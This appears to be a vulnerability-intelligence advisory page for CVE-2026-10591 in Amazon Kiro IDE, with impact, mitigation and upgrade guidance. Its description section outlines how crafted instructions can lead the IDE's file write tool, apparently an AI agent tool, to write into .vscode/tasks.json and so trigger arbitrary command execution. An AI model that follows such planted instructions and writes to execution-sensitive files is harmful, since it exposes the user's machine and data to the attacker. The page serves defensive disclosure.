High

Arbitrary Command Execution via File Write Tool in Amazon Kiro IDE

IdentifiersCVE-2026-10591CWE-732· Incorrect Permission Assignment…

CVE-2026-10591 is an insufficient access control vulnerability in the file write tool of Amazon Kiro IDE before version 0.11. A remote unauthenticated actor can supply crafted instructions that cause the IDE to write attacker-controlled content to execution-sensitive paths within a workspace, including files such as .vscode/tasks.json. Because such files can be automatically acted upon by the development environment when a folder is opened, the flaw can be leveraged to trigger arbitrary command execution. The issue stems from inadequate restrictions on where the file write tool is permitted to write, allowing modification of files that influence task execution behavior.

For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation can result in arbitrary command execution in the context of the user running Amazon Kiro IDE. This can compromise confidentiality, integrity, and availability by allowing an attacker to run commands, alter project files or IDE configuration, access data available to the user, and potentially disrupt the local development environment. The provided CVSS context indicates high impact to confidentiality, integrity, and availability, with user interaction required.

Mitigation

If you can’t patch tonight, do this now.

If immediate upgrade is not possible, reduce exposure by avoiding untrusted remote content or instructions that can influence the IDE's file write behavior, and monitor or restrict writes to execution-sensitive workspace files such as .vscode/tasks.json. Users should avoid opening folders whose workspace metadata may have been modified by untrusted sources until the IDE is updated. However, the primary remediation is to upgrade to version 0.11 or later.

Remediation

Patch, then assume compromise.

Upgrade Amazon Kiro IDE to version 0.11 or later, which addresses the insufficient access control restrictions in the file write tool.

PUBLIC EXPLOITS

Exploits

No public exploits tracked yet. Mallory keeps watching.

VALID 0 / 0 TOTALView more in app

No public exploit code observed for this vulnerability.

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType

Amazon Web ServicesKiro Ideapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

ACTIVITY FEED

Recent activity

6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

6 SOURCESView more in app

cvefeed high severityNews

Jun 2, 2026

CVE-2026-10591 - Kiro IDE Insufficient File Write Restrictions to Execution-Sensitive Paths

A vulnerability in Amazon Kiro IDE before version 0.11 involving insufficient access control in the file write tool that could allow remote unauthenticated attackers to achieve arbitrary command execution by writing to execution-sensitive paths.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.

Start free trial

Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware

Malware families riding this exploit, with evidence and IOCs.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity5

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES

MITRE CVE

cve.org · CVE-2026-10591

NVD

nvd.nist.gov/vuln/detail/CVE-2026-10591

MITRE CWE · CWE-732

Incorrect Permission Assignment for Critical…

Vendor Advisory

aws.amazon.com/security/security-bulletins/2026-037-aws

Release Notes

kiro.dev/changelog/ide/0-11